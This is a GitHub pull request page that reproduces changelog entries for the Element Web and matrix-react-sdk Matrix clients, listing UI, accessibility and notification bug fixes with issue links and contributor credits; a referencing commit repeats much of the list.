* Fix spacing regression in user settings - roles & permissions ([\#10993](matrix-org/matrix-react-sdk#10993)). Fixes element-hq/element-web#25447 and element-hq/element-web#25451. Contributed by @kerryarchibald.
* Fall back to receipt timestamp if we have no event (react-sdk part) ([\#10974](matrix-org/matrix-react-sdk#10974)). Fixes element-hq/element-web#10954. Contributed by @andybalaam.
* Fix: Room header 'view your device list' does not link to new session manager ([\#10979](matrix-org/matrix-react-sdk#10979)). Fixes element-hq/element-web#25440. Contributed by @kerryarchibald.
* Fix display of devices without encryption support in Settings dialog ([\#10977](matrix-org/matrix-react-sdk#10977)). Fixes element-hq/element-web#25413.
* Use aria descriptions instead of labels for TextWithTooltip ([\#10952](matrix-org/matrix-react-sdk#10952)). Fixes element-hq/element-web#25398.
* Use grapheme-splitter instead of lodash for saving emoji from being ripped apart ([\#10976](matrix-org/matrix-react-sdk#10976)). Fixes element-hq/element-web#22196.
* Fix: content overflow in settings subsection ([\#10960](matrix-org/matrix-react-sdk#10960)). Fixes element-hq/element-web#25416. Contributed by @kerryarchibald.
* Make `Privacy Notice` external link on integration manager ToS clickable ([\#10914](matrix-org/matrix-react-sdk#10914)). Fixes element-hq/element-web#25384. Contributed by @luixxiul.
* Ensure that open message context menus are updated when the event is sent ([\#10950](matrix-org/matrix-react-sdk#10950)).
* Ensure that open sticker picker dialogs are updated when the widget configuration is updated. ([\#10945](matrix-org/matrix-react-sdk#10945)).
* Fix big emoji in replies ([\#10932](matrix-org/matrix-react-sdk#10932)). Fixes element-hq/element-web#24798.
* Hide empty `MessageActionBar` on message edit history dialog ([\#10447](matrix-org/matrix-react-sdk#10447)). Fixes element-hq/element-web#24903. Contributed by @luixxiul.
* Fix roving tab index getting confused after dragging space order ([\#10901](matrix-org/matrix-react-sdk#10901)).
* Attempt a potential workaround for stuck notifs ([\#3384](matrix-org/matrix-js-sdk#3384)). Fixes element-hq/element-web#25406. Contributed by @andybalaam.
* Update to seshat 3.0.1 ([\element-hq#960](element-hq#960)). Fixes element-hq#959.
* Fix macos update check exploding ([\element-hq#944](element-hq#944)). Fixes element-hq#668.
* Handle trailing dot FQDNs for domain-specific config.json files ([\#25351](element-hq/element-web#25351)). Fixes element-hq/element-web#8858.
* Ignore edits in message previews when they concern messages other than latest ([\#10868](matrix-org/matrix-react-sdk#10868)). Fixes element-hq/element-web#14872.
* Send correct receipts when viewing a room ([\#10864](matrix-org/matrix-react-sdk#10864)). Fixes element-hq/element-web#25196.
* Fix timeline search bar being overlapped by the right panel ([\#10809](matrix-org/matrix-react-sdk#10809)). Fixes element-hq/element-web#25291. Contributed by @luixxiul.
* Fix the state shown for call in rooms ([\#10833](matrix-org/matrix-react-sdk#10833)).
* Add string for membership event where both displayname & avatar change ([\#10880](matrix-org/matrix-react-sdk#10880)). Fixes element-hq/element-web#18026.
* Fix people space notification badge not updating for new DM invites ([\#10849](matrix-org/matrix-react-sdk#10849)). Fixes element-hq/element-web#23248.
* Fix regression in emoji picker order mangling after clearing filter ([\#10854](matrix-org/matrix-react-sdk#10854)). Fixes element-hq/element-web#25323.
* Fix: Edit history modal crash ([\#10834](matrix-org/matrix-react-sdk#10834)). Fixes element-hq/element-web#25309. Contributed by @kerryarchibald.
* Fix long room address and name not being clipped on room info card and update `_RoomSummaryCard.pcss` ([\#10811](matrix-org/matrix-react-sdk#10811)). Fixes element-hq/element-web#25293. Contributed by @luixxiul.
* Treat thumbnail upload failures as complete upload failures ([\#10829](matrix-org/matrix-react-sdk#10829)). Fixes element-hq/element-web#7069.
* Update finite automata to match user identifiers as per spec ([\#10798](matrix-org/matrix-react-sdk#10798)). Fixes element-hq/element-web#25246.
* Fix icon on empty notification panel ([\#10817](matrix-org/matrix-react-sdk#10817)). Fixes element-hq/element-web#25298 and element-hq/element-web#25302. Contributed by @luixxiul.
* Fix: Threads button is highlighted when I create a new room ([\#10819](matrix-org/matrix-react-sdk#10819)). Fixes element-hq/element-web#25284. Contributed by @kerryarchibald.
* Fix the top heading of notification panel ([\#10818](matrix-org/matrix-react-sdk#10818)). Fixes element-hq/element-web#25303. Contributed by @luixxiul.
* Fix the color of the verified E2EE icon on `RoomSummaryCard` ([\#10812](matrix-org/matrix-react-sdk#10812)). Fixes element-hq/element-web#25295. Contributed by @luixxiul.
* Fix: No feedback when waiting for the server on a /delete_devices request with SSO ([\#10795](matrix-org/matrix-react-sdk#10795)). Fixes element-hq/element-web#23096. Contributed by @kerryarchibald.
* Fix: reveal images when image previews are disabled ([\#10781](matrix-org/matrix-react-sdk#10781)). Fixes element-hq/element-web#25271. Contributed by @kerryarchibald.
* Fix accessibility issues around the room list and space panel ([\#10717](matrix-org/matrix-react-sdk#10717)). Fixes element-hq/element-web#13345.
* Ensure tooltip contents is linked via aria to the target element ([\#10729](matrix-org/matrix-react-sdk#10729)). Fixes vector-im/customer-retainer#43.
su-ex added a commit to SchildiChat/element-web that referenced this pull request Dec 13, 2023
* Redirect to the SSO page if `sso_redirect_options.on_welcome_page` is enabled and the URL hash is empty ([\element-hq#25495](element-hq#25495)). Contributed by @dhenneke.
* vector/index.html: Allow fetching blob urls ([\element-hq#25336](element-hq#25336)). Contributed by @SuperKenVery.
* When joining room in sub-space join the parents too ([\element-hq#11011](matrix-org/matrix-react-sdk#11011)).
* Include thread replies in message previews ([\element-hq#10631](matrix-org/matrix-react-sdk#10631)). Fixes element-hq#23920.
* Use semantic headings in space preferences ([\element-hq#11021](matrix-org/matrix-react-sdk#11021)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - Ignored users ([\element-hq#11006](matrix-org/matrix-react-sdk#11006)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - profile ([\element-hq#10973](matrix-org/matrix-react-sdk#10973)). Fixes element-hq#25461. Contributed by @kerryarchibald.
* Use semantic headings in user settings - account ([\element-hq#10972](matrix-org/matrix-react-sdk#10972)). Contributed by @kerryarchibald.
* Support `Insert from iPhone or iPad` in Safari ([\element-hq#10851](matrix-org/matrix-react-sdk#10851)). Fixes element-hq#25327. Contributed by @SuperKenVery.
* Specify supportedStages for User Interactive Auth ([\element-hq#10975](matrix-org/matrix-react-sdk#10975)). Fixes element-hq#19605.
* Pass device id to widgets ([\element-hq#10209](matrix-org/matrix-react-sdk#10209)). Contributed by @Fox32.
* Use semantic headings in user settings - discovery ([\element-hq#10838](matrix-org/matrix-react-sdk#10838)). Contributed by @kerryarchibald.
* Use semantic headings in user settings -  Notifications ([\element-hq#10948](matrix-org/matrix-react-sdk#10948)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - spellcheck and language ([\element-hq#10959](matrix-org/matrix-react-sdk#10959)). Contributed by @kerryarchibald.
* Use semantic headings in user settings Appearance ([\element-hq#10827](matrix-org/matrix-react-sdk#10827)). Contributed by @kerryarchibald.
* Use semantic heading in user settings Sidebar & Voip ([\element-hq#10782](matrix-org/matrix-react-sdk#10782)). Contributed by @kerryarchibald.
* Use semantic headings in user settings Security ([\element-hq#10774](matrix-org/matrix-react-sdk#10774)). Contributed by @kerryarchibald.
* Use semantic headings in user settings - integrations and account deletion ([\#10837](matrix-org/matrix-react-sdk#10837)). Fixes element-hq#25378. Contributed by @kerryarchibald.
* Use semantic headings in user settings Preferences ([\element-hq#10794](matrix-org/matrix-react-sdk#10794)). Contributed by @kerryarchibald.
* Use semantic headings in user settings Keyboard ([\element-hq#10793](matrix-org/matrix-react-sdk#10793)). Contributed by @kerryarchibald.
* RTE plain text mentions as pills ([\element-hq#10852](matrix-org/matrix-react-sdk#10852)). Contributed by @alunturner.
* Allow welcome.html logo to be replaced by config ([\element-hq#25339](element-hq#25339)). Fixes element-hq#8636.
* Use semantic headings in user settings Labs ([\element-hq#10773](matrix-org/matrix-react-sdk#10773)). Contributed by @kerryarchibald.
* Use semantic list elements for menu lists and tab lists ([\element-hq#10902](matrix-org/matrix-react-sdk#10902)). Fixes element-hq#24928.
* Fix aria-required-children axe violation ([\element-hq#10900](matrix-org/matrix-react-sdk#10900)). Fixes element-hq#25342.
* Enable pagination for overlay timelines ([\element-hq#10757](matrix-org/matrix-react-sdk#10757)). Fixes vector-im/voip-internal#107.
* Add tooltip to disabled invite button due to lack of permissions ([\element-hq#10869](matrix-org/matrix-react-sdk#10869)). Fixes element-hq#9824.
* Respect configured auth_header_logo_url for default Welcome page ([\element-hq#10870](matrix-org/matrix-react-sdk#10870)).
* Specify lazy loading for avatars ([\element-hq#10866](matrix-org/matrix-react-sdk#10866)). Fixes element-hq#1983.
* Room and user mentions for plain text editor ([\element-hq#10665](matrix-org/matrix-react-sdk#10665)). Contributed by @alunturner.
* Add audible notifcation on broadcast error ([\#10654](matrix-org/matrix-react-sdk#10654)). Fixes element-hq#25132.
* Fall back from server generated thumbnail to original image ([\element-hq#10853](matrix-org/matrix-react-sdk#10853)).
* Use semantically correct elements for room sublist context menu ([\element-hq#10831](matrix-org/matrix-react-sdk#10831)). Fixes vector-im/customer-retainer#46.
* Avoid calling prepareToEncrypt onKeyDown ([\element-hq#10828](matrix-org/matrix-react-sdk#10828)).
* Allows search to recognize full room links ([\element-hq#8275](matrix-org/matrix-react-sdk#8275)). Contributed by @bolu-tife.
* "Show rooms with unread messages first" should not be on by default for new users ([\element-hq#10820](matrix-org/matrix-react-sdk#10820)). Fixes element-hq#25304. Contributed by @kerryarchibald.
* Fix emitter handler leak in ThreadView ([\element-hq#10803](matrix-org/matrix-react-sdk#10803)).
* Add better error for email invites without identity server ([\element-hq#10739](matrix-org/matrix-react-sdk#10739)). Fixes element-hq#16893.
* Move reaction message previews out of labs ([\element-hq#10601](matrix-org/matrix-react-sdk#10601)). Fixes element-hq#25083.
* Sort muted rooms to the bottom of their section of the room list ([\element-hq#10592](matrix-org/matrix-react-sdk#10592)). Fixes element-hq#25131. Contributed by @kerryarchibald.
* Use semantic headings in user settings Help & About ([\element-hq#10752](matrix-org/matrix-react-sdk#10752)). Contributed by @kerryarchibald.
* use ExternalLink components for external links ([\element-hq#10758](matrix-org/matrix-react-sdk#10758)). Contributed by @kerryarchibald.
* Use semantic headings in space settings ([\element-hq#10751](matrix-org/matrix-react-sdk#10751)). Contributed by @kerryarchibald.
* Use semantic headings for room settings content ([\element-hq#10734](matrix-org/matrix-react-sdk#10734)). Contributed by @kerryarchibald.
* Use consistent fonts for Japanese text ([\element-hq#10980](matrix-org/matrix-react-sdk#10980)). Fixes element-hq#22333 and element-hq#23899.
* Fix: server picker validates unselected option ([\element-hq#11020](matrix-org/matrix-react-sdk#11020)). Fixes element-hq#25488. Contributed by @kerryarchibald.
* Fix room list notification badges going missing in compact layout ([\element-hq#11022](matrix-org/matrix-react-sdk#11022)). Fixes element-hq#25372.
* Fix call to `startSingleSignOn` passing enum in place of idpId ([\element-hq#10998](matrix-org/matrix-react-sdk#10998)). Fixes element-hq#24953.
* Remove hover effect from user name on a DM creation UI ([\element-hq#10887](matrix-org/matrix-react-sdk#10887)). Fixes element-hq#25305. Contributed by @luixxiul.
* Fix layout regression in public space invite dialog ([\element-hq#11009](matrix-org/matrix-react-sdk#11009)). Fixes element-hq#25458.
* Fix layout regression in session dropdown ([\element-hq#10999](matrix-org/matrix-react-sdk#10999)). Fixes element-hq#25448.
* Fix spacing regression in user settings - roles & permissions ([\element-hq#10993](matrix-org/matrix-react-sdk#10993)). Fixes element-hq#25447 and element-hq#25451. Contributed by @kerryarchibald.
* Fall back to receipt timestamp if we have no event (react-sdk part) ([\element-hq#10974](matrix-org/matrix-react-sdk#10974)). Fixes element-hq#10954. Contributed by @andybalaam.
* Fix: Room header 'view your device list' does not link to new session manager ([\element-hq#10979](matrix-org/matrix-react-sdk#10979)). Fixes element-hq#25440. Contributed by @kerryarchibald.
* Fix display of devices without encryption support in Settings dialog ([\element-hq#10977](matrix-org/matrix-react-sdk#10977)). Fixes element-hq#25413.
* Use aria descriptions instead of labels for TextWithTooltip ([\element-hq#10952](matrix-org/matrix-react-sdk#10952)). Fixes element-hq#25398.
* Use grapheme-splitter instead of lodash for saving emoji from being ripped apart ([\element-hq#10976](matrix-org/matrix-react-sdk#10976)). Fixes element-hq#22196.
* Fix: content overflow in settings subsection ([\#10960](matrix-org/matrix-react-sdk#10960)). Fixes element-hq#25416. Contributed by @kerryarchibald.
* Make `Privacy Notice` external link on integration manager ToS clickable ([\element-hq#10914](matrix-org/matrix-react-sdk#10914)). Fixes element-hq#25384. Contributed by @luixxiul.
* Ensure that open message context menus are updated when the event is sent ([\element-hq#10950](matrix-org/matrix-react-sdk#10950)).
* Ensure that open sticker picker dialogs are updated when the widget configuration is updated. ([\#10945](matrix-org/matrix-react-sdk#10945)).
* Fix big emoji in replies ([\element-hq#10932](matrix-org/matrix-react-sdk#10932)). Fixes element-hq#24798.
* Hide empty `MessageActionBar` on message edit history dialog ([\element-hq#10447](matrix-org/matrix-react-sdk#10447)). Fixes element-hq#24903. Contributed by @luixxiul.
* Fix roving tab index getting confused after dragging space order ([\element-hq#10901](matrix-org/matrix-react-sdk#10901)).
* Attempt a potential workaround for stuck notifs ([\element-hq#3384](matrix-org/matrix-js-sdk#3384)). Fixes element-hq#25406. Contributed by @andybalaam.
* Handle trailing dot FQDNs for domain-specific config.json files ([\element-hq#25351](element-hq#25351)). Fixes element-hq#8858.
* Ignore edits in message previews when they concern messages other than latest ([\element-hq#10868](matrix-org/matrix-react-sdk#10868)). Fixes element-hq#14872.
* Send correct receipts when viewing a room ([\element-hq#10864](matrix-org/matrix-react-sdk#10864)). Fixes element-hq#25196.
* Fix timeline search bar being overlapped by the right panel ([\element-hq#10809](matrix-org/matrix-react-sdk#10809)). Fixes element-hq#25291. Contributed by @luixxiul.
* Fix the state shown for call in rooms ([\element-hq#10833](matrix-org/matrix-react-sdk#10833)).
* Add string for membership event where both displayname & avatar change ([\element-hq#10880](matrix-org/matrix-react-sdk#10880)). Fixes element-hq#18026.
* Fix people space notification badge not updating for new DM invites ([\element-hq#10849](matrix-org/matrix-react-sdk#10849)). Fixes element-hq#23248.
* Fix regression in emoji picker order mangling after clearing filter ([\element-hq#10854](matrix-org/matrix-react-sdk#10854)). Fixes element-hq#25323.
* Fix: Edit history modal crash ([\#10834](matrix-org/matrix-react-sdk#10834)). Fixes element-hq#25309. Contributed by @kerryarchibald.
* Fix long room address and name not being clipped on room info card and update `_RoomSummaryCard.pcss` ([\element-hq#10811](matrix-org/matrix-react-sdk#10811)). Fixes element-hq#25293. Contributed by @luixxiul.
* Treat thumbnail upload failures as complete upload failures ([\element-hq#10829](matrix-org/matrix-react-sdk#10829)). Fixes element-hq#7069.
* Update finite automata to match user identifiers as per spec ([\#10798](matrix-org/matrix-react-sdk#10798)). Fixes element-hq#25246.
* Fix icon on empty notification panel ([\element-hq#10817](matrix-org/matrix-react-sdk#10817)). Fixes element-hq#25298 and element-hq#25302. Contributed by @luixxiul.
* Fix: Threads button is highlighted when I create a new room ([\element-hq#10819](matrix-org/matrix-react-sdk#10819)). Fixes element-hq#25284. Contributed by @kerryarchibald.
* Fix the top heading of notification panel ([\element-hq#10818](matrix-org/matrix-react-sdk#10818)). Fixes element-hq#25303. Contributed by @luixxiul.
* Fix the color of the verified E2EE icon on `RoomSummaryCard` ([\element-hq#10812](matrix-org/matrix-react-sdk#10812)). Fixes element-hq#25295. Contributed by @luixxiul.
* Fix: No feedback when waiting for the server on a /delete_devices request with SSO ([\element-hq#10795](matrix-org/matrix-react-sdk#10795)). Fixes element-hq#23096. Contributed by @kerryarchibald.
* Fix: reveal images when image previews are disabled ([\element-hq#10781](matrix-org/matrix-react-sdk#10781)). Fixes element-hq#25271. Contributed by @kerryarchibald.
* Fix accessibility issues around the room list and space panel ([\element-hq#10717](matrix-org/matrix-react-sdk#10717)). Fixes element-hq#13345.
* Ensure tooltip contents is linked via aria to the target element ([\#10729](matrix-org/matrix-react-sdk#10729)). Fixes vector-im/customer-retainer#43.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
T-Enhancement Z-Community-PR Issue is solved by a community member's PR
Projects
None yet
Development

Successfully merging this pull request may close these issues.

4 participants